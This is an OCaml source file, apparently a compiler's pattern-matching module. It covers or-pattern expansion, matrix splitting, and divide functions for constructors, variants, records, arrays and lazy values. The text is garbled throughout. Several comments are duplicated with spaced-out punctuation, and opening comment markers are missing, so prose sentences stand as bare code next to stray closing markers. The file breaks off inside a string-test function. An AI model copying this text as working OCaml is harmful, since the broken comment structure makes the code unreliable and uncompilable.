let simplify_cases args cls = match args with
| [] -> assert false
| (arg,_)::_ ->
let rec simplify = function
| [] -> []
| ((pat :: patl, action) as cl) :: rem ->
begin match pat.pat_desc with
| Tpat_var (id, _) ->
(omega :: patl, bind Alias id arg action) ::
simplify rem
| Tpat_any ->
cl :: simplify rem
| Tpat_alias(p, id,_) ->
simplify ((p :: patl, bind Alias id arg action) :: rem)
| Tpat_record ([],_) ->
(omega :: patl, action)::
simplify rem
| Tpat_record (lbls, closed) ->
let all_lbls = all_record_args lbls in
let full_pat =
{pat with pat_desc=Tpat_record (all_lbls, closed)} in
(full_pat::patl,action)::
simplify rem
| Tpat_or _ ->
let pat_simple = simplify_or pat in
begin match pat_simple.pat_desc with
| Tpat_or _ ->
(pat_simple :: patl, action) ::
simplify rem
| _ ->
simplify ((pat_simple::patl,action) :: rem)
end
| _ -> cl :: simplify rem
end
| _ -> assert false in
simplify cls
(* Once matchings are simplified one can easily find
their nature *)
let rec what_is_cases cases = match cases with
| ({pat_desc=Tpat_any} :: _, _) :: rem -> what_is_cases rem
| (({pat_desc=(Tpat_var _|Tpat_or (_,_,_)|Tpat_alias (_,_,_))}::_),_)::_
-> assert false (* applies to simplified matchings only *)
| (p::_,_)::_ -> p
| [] -> omega
| _ -> assert false
(* A few operations on default environments *)
let as_matrix cases = get_mins le_pats (List.map (fun (ps,_) -> ps) cases)
let cons_default matrix raise_num default =
match matrix with
| [] -> default
| _ -> (matrix,raise_num)::default
let default_compat p def =
List.fold_right
(fun (pss,i) r ->
let qss =
List.fold_right
(fun qs r -> match qs with
| q::rem when may_compat p q -> rem::r
| _ -> r)
pss [] in
match qss with
| [] -> r
| _ -> (qss,i)::r)
def []
(* Or-pattern expansion, variables are a complication w.r.t. the article *)
let rec extract_vars r p = match p.pat_desc with
| Tpat_var (id, _) -> IdentSet.add id r
| Tpat_alias (p, id,_ ) ->
extract_vars (IdentSet.add id r) p
| Tpat_tuple pats ->
List.fold_left extract_vars r pats
| Tpat_record (lpats,_) ->
List.fold_left
(fun r (_, _, p) -> extract_vars r p)
r lpats
| Tpat_construct (_, _, pats) ->
List.fold_left extract_vars r pats
| Tpat_array pats ->
List.fold_left extract_vars r pats
| Tpat_variant (_,Some p, _) -> extract_vars r p
| Tpat_lazy p -> extract_vars r p
| Tpat_or (p,_,_) -> extract_vars r p
| Tpat_constant _|Tpat_any|Tpat_variant (_,None,_) -> r
exception Cannot_flatten
let mk_alpha_env arg aliases ids =
List.map
(fun id -> id,
if List.mem id aliases then
match arg with
| Some v -> v
| _ -> raise Cannot_flatten
else
Ident.create (Ident.name id))
ids
let rec explode_or_pat arg patl mk_action rem vars aliases = function
| {pat_desc = Tpat_or (p1,p2,_)} ->
explode_or_pat
arg patl mk_action
(explode_or_pat arg patl mk_action rem vars aliases p2)
vars aliases p1
| {pat_desc = Tpat_alias (p,id, _)} ->
explode_or_pat arg patl mk_action rem vars (id::aliases) p
| {pat_desc = Tpat_var (x, _)} ->
let env = mk_alpha_env arg (x::aliases) vars in
(omega::patl,mk_action (List.map snd env))::rem
| p ->
let env = mk_alpha_env arg aliases vars in
(alpha_pat env p::patl,mk_action (List.map snd env))::rem
let pm_free_variables {cases=cases} =
List.fold_right
(fun (_,act) r -> IdentSet.union (free_variables act) r)
cases IdentSet.empty
(* Basic grouping predicates *)
let pat_as_constr = function
| {pat_desc=Tpat_construct (_, cstr,_)} -> cstr
| _ -> fatal_error "Matching.pat_as_constr"
let group_constant = function
| {pat_desc= Tpat_constant _} -> true
| _ -> false
and group_constructor = function
| {pat_desc = Tpat_construct (_,_,_)} -> true
| _ -> false
and group_variant = function
| {pat_desc = Tpat_variant (_, _, _)} -> true
| _ -> false
and group_var = function
| {pat_desc=Tpat_any} -> true
| _ -> false
and group_tuple = function
| {pat_desc = (Tpat_tuple _|Tpat_any)} -> true
| _ -> false
and group_record = function
| {pat_desc = (Tpat_record _|Tpat_any)} -> true
| _ -> false
and group_array = function
| {pat_desc=Tpat_array _} -> true
| _ -> false
and group_lazy = function
| {pat_desc = Tpat_lazy _} -> true
| _ -> false
let get_group p = match p.pat_desc with
| Tpat_any -> group_var
| Tpat_constant _ -> group_constant
| Tpat_construct _ -> group_constructor
| Tpat_tuple _ -> group_tuple
| Tpat_record _ -> group_record
| Tpat_array _ -> group_array
| Tpat_variant (_,_,_) -> group_variant
| Tpat_lazy _ -> group_lazy
| _ -> fatal_error "Matching.get_group"
let is_or p = match p.pat_desc with
| Tpat_or _ -> true
| _ -> false
(* Conditions for appending to the Or matrix *)
let conda p q = not (may_compat p q)
and condb act ps qs = not (is_guarded act) && Parmatch.le_pats qs ps
let or_ok p ps l =
List.for_all
(function
| ({pat_desc=Tpat_or _} as q::qs,act) ->
conda p q || condb act ps qs
| _ -> true)
l
(* Insert or append a pattern in the Or matrix *)
let equiv_pat p q = le_pat p q && le_pat q p
let rec get_equiv p l = match l with
| (q::_,_) as cl::rem ->
if equiv_pat p q then
let others,rem = get_equiv p rem in
cl::others,rem
else
[],l
| _ -> [],l
let insert_or_append p ps act ors no =
let rec attempt seen = function
| (q::qs,act_q) as cl::rem ->
if is_or q then begin
if may_compat p q then
if
IdentSet.is_empty (extract_vars IdentSet.empty p) &&
IdentSet.is_empty (extract_vars IdentSet.empty q) &&
equiv_pat p q
then (* attempt insert, for equivalent orpats with no variables *)
let _, not_e = get_equiv q rem in
if
or_ok p ps not_e && (* check append condition for head of O *)
List.for_all (* check insert condition for tail of O *)
(fun cl -> match cl with
| (q::_,_) -> not (may_compat p q)
| _ -> assert false)
seen
then (* insert *)
List.rev_append seen ((p::ps,act)::cl::rem), no
else (* fail to insert or append *)
ors,(p::ps,act)::no
else if condb act_q ps qs then (* check condition (b) for append *)
attempt (cl::seen) rem
else
ors,(p::ps,act)::no
else (* p # q, go on with append/insert *)
attempt (cl::seen) rem
end else (* q is not an or-pat, go on with append/insert *)
attempt (cl::seen) rem
| _ -> (* [] in fact *)
(p::ps,act)::ors,no in (* success in appending *)
attempt [] ors
Reconstruct default information from half_compiled pm list
let rec rebuild_matrix pmh = match pmh with
| Pm pm -> as_matrix pm.cases
| PmOr {or_matrix=m} -> m
| PmVar x -> add_omega_column (rebuild_matrix x.inside)
let rec rebuild_default nexts def = match nexts with
| [] -> def
| (e, pmh)::rem ->
(add_omega_column (rebuild_matrix pmh), e)::
rebuild_default rem def
let rebuild_nexts arg nexts k =
List.fold_right
(fun (e, pm) k -> (e, PmVar {inside=pm ; var_arg=arg})::k)
nexts k
Split a matching .
Splitting is first directed by or - patterns , then by
tests ( e.g. constructors)/variable transitions .
The approach is greedy , every split function attempts to
raise rows as much as possible in the top matrix ,
then splitting applies again to the remaining rows .
Some precompilation of or - patterns and
variable pattern occurs . Mostly this means that bindings
are performed now , being replaced by let - bindings
in actions ( cf . simplify_cases ) .
Additionally , if the match argument is a variable , matchings whose
first column is made of variables only are splitted further
( cf . precompile_var ) .
Split a matching.
Splitting is first directed by or-patterns, then by
tests (e.g. constructors)/variable transitions.
The approach is greedy, every split function attempts to
raise rows as much as possible in the top matrix,
then splitting applies again to the remaining rows.
Some precompilation of or-patterns and
variable pattern occurs. Mostly this means that bindings
are performed now, being replaced by let-bindings
in actions (cf. simplify_cases).
Additionally, if the match argument is a variable, matchings whose
first column is made of variables only are splitted further
(cf. precompile_var).
*)
let rec split_or argo cls args def =
let cls = simplify_cases args cls in
let rec do_split before ors no = function
| [] ->
cons_next
(List.rev before) (List.rev ors) (List.rev no)
| ((p::ps,act) as cl)::rem ->
if up_ok cl no then
if is_or p then
let ors, no = insert_or_append p ps act ors no in
do_split before ors no rem
else begin
if up_ok cl ors then
do_split (cl::before) ors no rem
else if or_ok p ps ors then
do_split before (cl::ors) no rem
else
do_split before ors (cl::no) rem
end
else
do_split before ors (cl::no) rem
| _ -> assert false
and cons_next yes yesor = function
| [] ->
precompile_or argo yes yesor args def []
| rem ->
let {me=next ; matrix=matrix ; top_default=def},nexts =
do_split [] [] [] rem in
let idef = next_raise_count () in
precompile_or
argo yes yesor args
(cons_default matrix idef def)
((idef,next)::nexts) in
do_split [] [] [] cls
Ultra - naive splitting , close to semantics , used for extension ,
as potential rebind prevents any kind of optimisation
as potential rebind prevents any kind of optimisation *)
and split_naive cls args def k =
let rec split_exc cstr0 yes = function
| [] ->
let yes = List.rev yes in
{ me = Pm {cases=yes; args=args; default=def;} ;
matrix = as_matrix yes ;
top_default=def},
k
| (p::_,_ as cl)::rem ->
if group_constructor p then
let cstr = pat_as_constr p in
if cstr = cstr0 then split_exc cstr0 (cl::yes) rem
else
let yes = List.rev yes in
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_exc cstr [cl] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{ me = Pm {cases=yes; args=args; default=def} ;
matrix = as_matrix yes ;
top_default = def; },
(idef,next)::nexts
else
let yes = List.rev yes in
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_noexc [cl] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{ me = Pm {cases=yes; args=args; default=def} ;
matrix = as_matrix yes ;
top_default = def; },
(idef,next)::nexts
| _ -> assert false
and split_noexc yes = function
| [] -> precompile_var args (List.rev yes) def k
| (p::_,_ as cl)::rem ->
if group_constructor p then
let yes= List.rev yes in
let {me=next; matrix=matrix; top_default=def;},nexts =
split_exc (pat_as_constr p) [cl] rem in
let idef = next_raise_count () in
precompile_var
args yes
(cons_default matrix idef def)
((idef,next)::nexts)
else split_noexc (cl::yes) rem
| _ -> assert false in
match cls with
| [] -> assert false
| (p::_,_ as cl)::rem ->
if group_constructor p then
split_exc (pat_as_constr p) [cl] rem
else
split_noexc [cl] rem
| _ -> assert false
and split_constr cls args def k =
let ex_pat = what_is_cases cls in
match ex_pat.pat_desc with
| Tpat_any -> precompile_var args cls def k
| Tpat_construct (_,{cstr_tag=Cstr_extension _},_) ->
split_naive cls args def k
| _ ->
let group = get_group ex_pat in
let rec split_ex yes no = function
| [] ->
let yes = List.rev yes and no = List.rev no in
begin match no with
| [] ->
{me = Pm {cases=yes ; args=args ; default=def} ;
matrix = as_matrix yes ;
top_default = def},
k
| cl::rem ->
begin match yes with
| [] ->
(* Could not success in raising up a constr matching up *)
split_noex [cl] [] rem
| _ ->
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_noex [cl] [] rem in
let idef = next_raise_count () in
let def = cons_default matrix idef def in
{me = Pm {cases=yes ; args=args ; default=def} ;
matrix = as_matrix yes ;
top_default = def },
(idef, next)::nexts
end
end
| (p::_,_) as cl::rem ->
if group p && up_ok cl no then
split_ex (cl::yes) no rem
else
split_ex yes (cl::no) rem
| _ -> assert false
and split_noex yes no = function
| [] ->
let yes = List.rev yes and no = List.rev no in
begin match no with
| [] -> precompile_var args yes def k
| cl::rem ->
let {me=next ; matrix=matrix ; top_default=def}, nexts =
split_ex [cl] [] rem in
let idef = next_raise_count () in
precompile_var
args yes
(cons_default matrix idef def)
((idef,next)::nexts)
end
| [ps,_ as cl]
when List.for_all group_var ps && yes <> [] ->
(* This enables an extra division in some frequent cases :
last row is made of variables only *)
split_noex yes (cl::no) []
| (p::_,_) as cl::rem ->
if not (group p) && up_ok cl no then
split_noex (cl::yes) no rem
else
split_noex yes (cl::no) rem
| _ -> assert false in
match cls with
| ((p::_,_) as cl)::rem ->
if group p then split_ex [cl] [] rem
else split_noex [cl] [] rem
| _ -> assert false
and precompile_var args cls def k = match args with
| [] -> assert false
| _::((Lvar v as av,_) as arg)::rargs ->
begin match cls with
| [_] -> (* as splitted as it can *)
dont_precompile_var args cls def k
| _ ->
(* Precompile *)
let var_cls =
List.map
(fun (ps,act) -> match ps with
| _::ps -> ps,act | _ -> assert false)
cls
and var_def = make_default (fun _ rem -> rem) def in
let {me=first ; matrix=matrix}, nexts =
split_or (Some v) var_cls (arg::rargs) var_def in
(* Compute top information *)
match nexts with
| [] -> (* If you need *)
dont_precompile_var args cls def k
| _ ->
let rfirst =
{me = PmVar {inside=first ; var_arg = av} ;
matrix = add_omega_column matrix ;
top_default = rebuild_default nexts def ; }
and rnexts = rebuild_nexts av nexts k in
rfirst, rnexts
end
| _ ->
dont_precompile_var args cls def k
and dont_precompile_var args cls def k =
{me = Pm {cases = cls ; args = args ; default = def } ;
matrix=as_matrix cls ;
top_default=def},k
and precompile_or argo cls ors args def k = match ors with
| [] -> split_constr cls args def k
| _ ->
let rec do_cases = function
| ({pat_desc=Tpat_or _} as orp::patl, action)::rem ->
let others,rem = get_equiv orp rem in
let orpm =
{cases =
(patl, action)::
List.map
(function
| (_::ps,action) -> ps,action
| _ -> assert false)
others ;
args = (match args with _::r -> r | _ -> assert false) ;
default = default_compat orp def} in
let vars =
IdentSet.elements
(IdentSet.inter
(extract_vars IdentSet.empty orp)
(pm_free_variables orpm)) in
let or_num = next_raise_count () in
let new_patl = Parmatch.omega_list patl in
let mk_new_action vs =
Lstaticraise
(or_num, List.map (fun v -> Lvar v) vs) in
let body,handlers = do_cases rem in
explode_or_pat
argo new_patl mk_new_action body vars [] orp,
let mat = [[orp]] in
((mat, or_num, vars , orpm):: handlers)
| cl::rem ->
let new_ord,new_to_catch = do_cases rem in
cl::new_ord,new_to_catch
| [] -> [],[] in
let end_body, handlers = do_cases ors in
let matrix = as_matrix (cls@ors)
and body = {cases=cls@end_body ; args=args ; default=def} in
{me = PmOr {body=body ; handlers=handlers ; or_matrix=matrix} ;
matrix=matrix ;
top_default=def},
k
let split_precompile argo pm =
let {me=next}, nexts = split_or argo pm.cases pm.args pm.default in
if dbg && (nexts <> [] || (match next with PmOr _ -> true | _ -> false))
then begin
prerr_endline "** SPLIT **" ;
pretty_pm pm ;
pretty_precompiled_res next nexts
end ;
next, nexts
(* General divide functions *)
let add_line patl_action pm = pm.cases <- patl_action :: pm.cases; pm
type cell =
{pm : pattern_matching ;
ctx : ctx list ;
pat : pattern}
let add make_matching_fun division eq_key key patl_action args =
try
let (_,cell) = List.find (fun (k,_) -> eq_key key k) division in
cell.pm.cases <- patl_action :: cell.pm.cases;
division
with Not_found ->
let cell = make_matching_fun args in
cell.pm.cases <- [patl_action] ;
(key, cell) :: division
let divide make eq_key get_key get_args ctx pm =
let rec divide_rec = function
| (p::patl,action) :: rem ->
let this_match = divide_rec rem in
add
(make p pm.default ctx)
this_match eq_key (get_key p) (get_args p patl,action) pm.args
| _ -> [] in
divide_rec pm.cases
let divide_line make_ctx make get_args pat ctx pm =
let rec divide_rec = function
| (p::patl,action) :: rem ->
let this_match = divide_rec rem in
add_line (get_args p patl, action) this_match
| _ -> make pm.default pm.args in
{pm = divide_rec pm.cases ;
ctx=make_ctx ctx ;
pat=pat}
Then come various functions ,
There is one set of functions per matching style
( constants , constructors etc . )
- matcher functions are arguments to ( for default handlers )
They may raise NoMatch or and perform the full
matching ( selection + arguments ) .
- get_args and get_key are for the compiled matrices , note that
selection and getting arguments are separated .
- make _ _ matching combines the previous functions for producing
new ` ` pattern_matching '' records .
There is one set of functions per matching style
(constants, constructors etc.)
- matcher functions are arguments to make_default (for default handlers)
They may raise NoMatch or OrPat and perform the full
matching (selection + arguments).
- get_args and get_key are for the compiled matrices, note that
selection and getting arguments are separated.
- make_ _matching combines the previous functions for producing
new ``pattern_matching'' records.
*)
let rec matcher_const cst p rem = match p.pat_desc with
| Tpat_or (p1,p2,_) ->
begin try
matcher_const cst p1 rem with
| NoMatch -> matcher_const cst p2 rem
end
| Tpat_constant c1 when const_compare c1 cst = 0 -> rem
| Tpat_any -> rem
| _ -> raise NoMatch
let get_key_constant caller = function
| {pat_desc= Tpat_constant cst} -> cst
| p ->
prerr_endline ("BAD: "^caller) ;
pretty_pat p ;
assert false
let get_args_constant _ rem = rem
let make_constant_matching p def ctx = function
[] -> fatal_error "Matching.make_constant_matching"
| (_ :: argl) ->
let def =
make_default
(matcher_const (get_key_constant "make" p)) def
and ctx =
filter_ctx p ctx in
{pm = {cases = []; args = argl ; default = def} ;
ctx = ctx ;
pat = normalize_pat p}
let divide_constant ctx m =
divide
make_constant_matching
(fun c d -> const_compare c d = 0) (get_key_constant "divide")
get_args_constant
ctx m
(* Matching against a constructor *)
let make_field_args ~fld_info loc binding_kind arg first_pos last_pos argl =
let rec make_args pos =
if pos > last_pos
then argl
else (Lprim(Pfield (pos, fld_info), [arg], loc), binding_kind) :: make_args (pos + 1)
in make_args first_pos
let get_key_constr = function
| {pat_desc=Tpat_construct (_, cstr,_)} -> cstr.cstr_tag
| _ -> assert false
let get_args_constr p rem = match p with
| {pat_desc=Tpat_construct (_, _, args)} -> args @ rem
| _ -> assert false
NB : matcher_constr applies to default matrices .
In that context , matching by constructors of extensible
types degrades to arity checking , due to potential rebinding .
This comparison is performed by Types.may_equal_constr .
In that context, matching by constructors of extensible
types degrades to arity checking, due to potential rebinding.
This comparison is performed by Types.may_equal_constr.
*)
let matcher_constr cstr = match cstr.cstr_arity with
| 0 ->
let rec matcher_rec q rem = match q.pat_desc with
| Tpat_or (p1,p2,_) ->
begin
try matcher_rec p1 rem
with NoMatch -> matcher_rec p2 rem
end
| Tpat_construct (_, cstr',[])
when Types.may_equal_constr cstr cstr' -> rem
| Tpat_any -> rem
| _ -> raise NoMatch in
matcher_rec
| 1 ->
let rec matcher_rec q rem = match q.pat_desc with
| Tpat_or (p1,p2,_) ->
let r1 = try Some (matcher_rec p1 rem) with NoMatch -> None
and r2 = try Some (matcher_rec p2 rem) with NoMatch -> None in
begin match r1,r2 with
| None, None -> raise NoMatch
| Some r1, None -> r1
| None, Some r2 -> r2
| Some (a1::_), Some (a2::_) ->
{a1 with
pat_loc = Location.none ;
pat_desc = Tpat_or (a1, a2, None)}::
rem
| _, _ -> assert false
end
| Tpat_construct (_, cstr', [arg])
when Types.may_equal_constr cstr cstr' -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch in
matcher_rec
| _ ->
fun q rem -> match q.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_construct (_,cstr',args)
when Types.may_equal_constr cstr cstr' -> args @ rem
| Tpat_any -> Parmatch.omegas cstr.cstr_arity @ rem
| _ -> raise NoMatch
let is_not_none_bs_primitve : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#is_not_none" ~arity:1 ~alloc:false)
let val_from_option_bs_primitive : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#val_from_option" ~arity:1 ~alloc:true)
let val_from_unnest_option_bs_primitive : Lambda.primitive =
Pccall
(Primitive.simple ~name:"#val_from_unnest_option" ~arity:1 ~alloc:true)
let make_constr_matching p def ctx = function
[] -> fatal_error "Matching.make_constr_matching"
| ((arg, _mut) :: argl) ->
let cstr = pat_as_constr p in
let newargs =
if cstr.cstr_inlined <> None then
(arg, Alias) :: argl
else match cstr.cstr_tag with
| Cstr_block _ when
!Config.bs_only &&
Datarepr.constructor_has_optional_shape cstr
->
begin
let from_option =
match p.pat_desc with
| Tpat_construct(_, _,
[ {
pat_type ; pat_env
} ])
when Typeopt.cannot_inhabit_none_like_value pat_type pat_env
-> val_from_unnest_option_bs_primitive
| _ -> val_from_option_bs_primitive in
(Lprim (from_option, [arg], p.pat_loc), Alias) :: argl
end
| Cstr_constant _
| Cstr_block _ ->
make_field_args p.pat_loc Alias arg 0 (cstr.cstr_arity - 1) argl
~fld_info:(if cstr.cstr_name = "::" then Fld_cons else Fld_variant)
| Cstr_unboxed -> (arg, Alias) :: argl
| Cstr_extension _ ->
make_field_args p.pat_loc Alias arg 1 cstr.cstr_arity argl
~fld_info:Fld_extension
in
{pm=
{cases = []; args = newargs;
default = make_default (matcher_constr cstr) def} ;
ctx = filter_ctx p ctx ;
pat=normalize_pat p}
let divide_constructor ctx pm =
divide
make_constr_matching
Types.equal_tag get_key_constr get_args_constr
ctx pm
(* Matching against a variant *)
let rec matcher_variant_const lab p rem = match p.pat_desc with
| Tpat_or (p1, p2, _) ->
begin
try
matcher_variant_const lab p1 rem
with
| NoMatch -> matcher_variant_const lab p2 rem
end
| Tpat_variant (lab1,_,_) when lab1=lab -> rem
| Tpat_any -> rem
| _ -> raise NoMatch
let make_variant_matching_constant p lab def ctx = function
[] -> fatal_error "Matching.make_variant_matching_constant"
| (_ :: argl) ->
let def = make_default (matcher_variant_const lab) def
and ctx = filter_ctx p ctx in
{pm={ cases = []; args = argl ; default=def} ;
ctx=ctx ;
pat = normalize_pat p}
let matcher_variant_nonconst lab p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_variant (lab1,Some arg,_) when lab1=lab -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch
let make_variant_matching_nonconst p lab def ctx = function
[] -> fatal_error "Matching.make_variant_matching_nonconst"
| ((arg, _mut) :: argl) ->
let def = make_default (matcher_variant_nonconst lab) def
and ctx = filter_ctx p ctx in
{pm=
{cases = []; args = (Lprim(Pfield (1, Fld_poly_var_content), [arg], p.pat_loc), Alias) :: argl;
default=def} ;
ctx=ctx ;
pat = normalize_pat p}
let divide_variant row ctx {cases = cl; args = al; default=def} =
let row = Btype.row_repr row in
let rec divide = function
({pat_desc = Tpat_variant(lab, pato, _)} as p:: patl, action) :: rem ->
let variants = divide rem in
if try Btype.row_field_repr (List.assoc lab row.row_fields) = Rabsent
with Not_found -> true
then
variants
else begin
let tag = Btype.hash_variant lab in
let (=) ((a:string),(b:Types.constructor_tag)) (c,d) =
a = c && Types.equal_tag b d
in
match pato with
None ->
add (make_variant_matching_constant p lab def ctx) variants
(=) (lab,Cstr_constant tag) (patl, action) al
| Some pat ->
add (make_variant_matching_nonconst p lab def ctx) variants
(=) (lab,Cstr_block tag) (pat :: patl, action) al
end
| _ -> []
in
divide cl
Three ` ` no - test '' cases
Three ``no-test'' cases
*)
(* Matching against a variable *)
let get_args_var _ rem = rem
let make_var_matching def = function
| [] -> fatal_error "Matching.make_var_matching"
| _::argl ->
{cases=[] ;
args = argl ;
default= make_default get_args_var def}
let divide_var ctx pm =
divide_line ctx_lshift make_var_matching get_args_var omega ctx pm
(* Matching and forcing a lazy value *)
let get_arg_lazy p rem = match p with
| {pat_desc = Tpat_any} -> omega :: rem
| {pat_desc = Tpat_lazy arg} -> arg :: rem
| _ -> assert false
let matcher_lazy p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omega :: rem
| Tpat_lazy arg -> arg :: rem
| _ -> raise NoMatch
(* Inlining the tag tests before calling the primitive that works on
lazy blocks. This is also used in translcore.ml.
No other call than Obj.tag when the value has been forced before.
*)
let get_mod_field modname field =
lazy (
try
let mod_ident = Ident.create_persistent modname in
let env = Env.open_pers_signature modname Env.initial_safe_string in
let p = try
match Env.lookup_value (Longident.Lident field) env with
| (Path.Pdot(_,_,i), _) -> i
| _ -> fatal_error ("Primitive "^modname^"."^field^" not found.")
with Not_found ->
fatal_error ("Primitive "^modname^"."^field^" not found.")
in
Lprim(Pfield (p, Fld_module {name = field}),
[Lprim(Pgetglobal mod_ident, [], Location.none)],
Location.none)
with Not_found -> fatal_error ("Module "^modname^" unavailable.")
)
let code_force =
get_mod_field "CamlinternalLazy" "force"
;;
inline_lazy_force inlines the beginning of the code of Lazy.force . When
the value argument is tagged as :
- forward , take field 0
- lazy , call the primitive that forces ( without testing again the tag )
- anything else , return it
Using Lswitch below relies on the fact that the GC does not shortcut
Forward(val_out_of_heap ) .
the value argument is tagged as:
- forward, take field 0
- lazy, call the primitive that forces (without testing again the tag)
- anything else, return it
Using Lswitch below relies on the fact that the GC does not shortcut
Forward(val_out_of_heap).
*)
let inline_lazy_force arg loc =
Lapply { ap_func = Lazy.force code_force; ap_inlined = Default_inline; ap_args = [arg]; ap_loc = loc}
let make_lazy_matching def = function
[] -> fatal_error "Matching.make_lazy_matching"
| (arg,_mut) :: argl ->
{ cases = [];
args =
(inline_lazy_force arg Location.none, Strict) :: argl;
default = make_default matcher_lazy def }
let divide_lazy p ctx pm =
divide_line
(filter_ctx p)
make_lazy_matching
get_arg_lazy
p ctx pm
(* Matching against a tuple pattern *)
let get_args_tuple arity p rem = match p with
| {pat_desc = Tpat_any} -> omegas arity @ rem
| {pat_desc = Tpat_tuple args} ->
args @ rem
| _ -> assert false
let matcher_tuple arity p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omegas arity @ rem
| Tpat_tuple args when List.length args = arity -> args @ rem
| _ -> raise NoMatch
let make_tuple_matching loc arity def = function
[] -> fatal_error "Matching.make_tuple_matching"
| (arg, _mut) :: argl ->
let rec make_args pos =
if pos >= arity
then argl
else (Lprim(Pfield (pos, Fld_tuple), [arg], loc), Alias) :: make_args (pos + 1) in
{cases = []; args = make_args 0 ;
default=make_default (matcher_tuple arity) def}
let divide_tuple arity p ctx pm =
divide_line
(filter_ctx p)
(make_tuple_matching p.pat_loc arity)
(get_args_tuple arity) p ctx pm
(* Matching against a record pattern *)
let record_matching_line num_fields lbl_pat_list =
let patv = Array.make num_fields omega in
List.iter (fun (_, lbl, pat) -> patv.(lbl.lbl_pos) <- pat) lbl_pat_list;
Array.to_list patv
let get_args_record num_fields p rem = match p with
| {pat_desc=Tpat_any} ->
record_matching_line num_fields [] @ rem
| {pat_desc=Tpat_record (lbl_pat_list,_)} ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> assert false
let matcher_record num_fields p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ ->
record_matching_line num_fields [] @ rem
| Tpat_record ([], _) when num_fields = 0 -> rem
| Tpat_record ((_, lbl, _) :: _ as lbl_pat_list, _)
when Array.length lbl.lbl_all = num_fields ->
record_matching_line num_fields lbl_pat_list @ rem
| _ -> raise NoMatch
let make_record_matching loc all_labels def = function
[] -> fatal_error "Matching.make_record_matching"
| ((arg, _mut) :: argl) ->
let rec make_args pos =
if pos >= Array.length all_labels then argl else begin
let lbl = all_labels.(pos) in
let access =
match lbl.lbl_repres with
| Record_float_unused -> assert false
| Record_regular | Record_optional_labels _ ->
Lprim (Pfield (lbl.lbl_pos, !Lambda.fld_record lbl), [arg], loc)
| Record_inlined _ ->
Lprim (Pfield (lbl.lbl_pos, Fld_record_inline {name = lbl.lbl_name}), [arg], loc)
| Record_unboxed _ -> arg
| Record_extension -> Lprim (Pfield (lbl.lbl_pos + 1, Fld_record_extension {name = lbl.lbl_name}), [arg], loc)
in
let str =
match lbl.lbl_mut with
Immutable -> Alias
| Mutable -> StrictOpt in
(access, str) :: make_args(pos + 1)
end in
let nfields = Array.length all_labels in
let def= make_default (matcher_record nfields) def in
{cases = []; args = make_args 0 ; default = def}
let divide_record all_labels p ctx pm =
let get_args = get_args_record (Array.length all_labels) in
divide_line
(filter_ctx p)
(make_record_matching p.pat_loc all_labels)
get_args
p ctx pm
(* Matching against an array pattern *)
let get_key_array = function
| {pat_desc=Tpat_array patl} -> List.length patl
| _ -> assert false
let get_args_array p rem = match p with
| {pat_desc=Tpat_array patl} -> patl@rem
| _ -> assert false
let matcher_array len p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_array args when List.length args=len -> args @ rem
| Tpat_any -> Parmatch.omegas len @ rem
| _ -> raise NoMatch
let make_array_matching p def ctx = function
| [] -> fatal_error "Matching.make_array_matching"
| ((arg, _mut) :: argl) ->
let len = get_key_array p in
let rec make_args pos =
if pos >= len
then argl
else (Lprim(Parrayrefu ,
[arg; Lconst(Const_base(Const_int pos))],
p.pat_loc),
StrictOpt) :: make_args (pos + 1) in
let def = make_default (matcher_array len) def
and ctx = filter_ctx p ctx in
{pm={cases = []; args = make_args 0 ; default = def} ;
ctx=ctx ;
pat = normalize_pat p}
let divide_array ctx pm =
divide
make_array_matching
(=) get_key_array get_args_array ctx pm
Specific string test sequence
Will be called by the bytecode compiler , from bytegen.ml .
The strategy is first dichotomic search ( we perform 3 - way tests
with compare_string ) , then sequence of equality tests
when there are less then T = strings_test_threshold static strings to match .
Increasing T entails ( slightly ) less code , decreasing T
( slightly ) favors runtime speed .
T=8 looks a decent tradeoff .
Specific string test sequence
Will be called by the bytecode compiler, from bytegen.ml.
The strategy is first dichotomic search (we perform 3-way tests
with compare_string), then sequence of equality tests
when there are less then T=strings_test_threshold static strings to match.
Increasing T entails (slightly) less code, decreasing T
(slightly) favors runtime speed.
T=8 looks a decent tradeoff.
*)
Utilities
let strings_test_threshold = 8
let prim_string_notequal =
Pccall(Primitive.simple
~name:"caml_string_notequal"
~arity:2
~alloc:false)
let prim_string_compare =
Pccall(Primitive.simple
~name:"caml_string_compare"
~arity:2
~alloc:false)
let bind_sw arg k = match arg with
| Lvar _ -> k arg
| _ ->
let id = Ident.create "switch" in
Llet (Strict,Pgenval,id,arg,k (Lvar id))
(* Sequential equality tests *)
let make_string_test_sequence loc arg sw d =
let d,sw = match d with
| None ->
begin match sw with
| (_,d)::sw -> d,sw
| [] -> assert false
end
| Some d -> d,sw in
bind_sw arg
(fun arg ->
List.fold_right
(fun (s,lam) k ->
Lifthenelse
(Lprim
(prim_string_notequal,
[arg; Lconst (Const_immstring s)], loc),
k,lam))
sw d)
let rec split k xs = match xs with
| [] -> assert false
| x0::xs ->
if k <= 1 then [],x0,xs
else
let xs,y0,ys = split (k-2) xs in
x0::xs,y0,ys
let zero_lam = Lconst (Const_base (Const_int 0))
let tree_way_test loc arg lt eq gt =
Lifthenelse
(Lprim (Pintcomp Clt,[arg;zero_lam], loc),lt,
Lifthenelse(Lprim (Pintcomp Clt,[zero_lam;arg], loc),gt,eq))
(* Dichotomic tree *)
let rec do_make_string_test_tree loc arg sw delta d =
let len = List.length sw in
if len <= strings_test_threshold+delta then
make_string_test_sequence loc arg sw d
else
